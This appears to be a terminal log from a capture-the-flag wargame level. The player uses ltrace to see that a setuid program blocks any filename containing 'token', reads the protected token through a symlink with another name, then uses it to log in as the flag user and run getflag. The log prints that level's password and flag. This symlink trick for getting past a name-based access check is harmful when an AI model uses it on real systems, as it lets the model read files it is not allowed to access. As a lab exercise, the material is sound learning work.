
ls
level08  token

ltrace ./level08 
__libc_start_main(0x8048554, 1, 0xbffff7d4, 0x80486b0, 0x8048720 <unfinished ...>
printf("%s [file to read]\n", "./level08"./level08 [file to read]
)               = 25
exit(1 <unfinished ...>
+++ exited (status 1) +++

cat token 
cat: token: Permission denied

./level08 token 
You may not access 'token'

ltrace ./level08 token
__libc_start_main(0x8048554, 2, 0xbffff7d4, 0x80486b0, 0x8048720 <unfinished ...>
strstr("token", "token")                                 = "token"
printf("You may not access '%s'\n", "token"You may not access 'token'
)             = 27
exit(1 <unfinished ...>
+++ exited (status 1) +++

ln -s token /tmp/asd

./level08 /tmp/asd

level08: Unable to open /tmp/asd: No such file or directory

ls -la /tmp
ls: cannot open directory /tmp: Permission denied

chmod 777 /tmp
chmod: changing permissions of `/tmp': Operation not permitted

chmod 777 .

ln -s token asd

ls
asd  level08  token

./level08 asd
quif5eloekouj29ke0vouxean

su flag08
Password: quif5eloekouj29ke0vouxean
Don't forget to launch getflag !

getflag
Check flag.Here is your token : 25749xKZ8L7DkSCwJkT9dyv6f
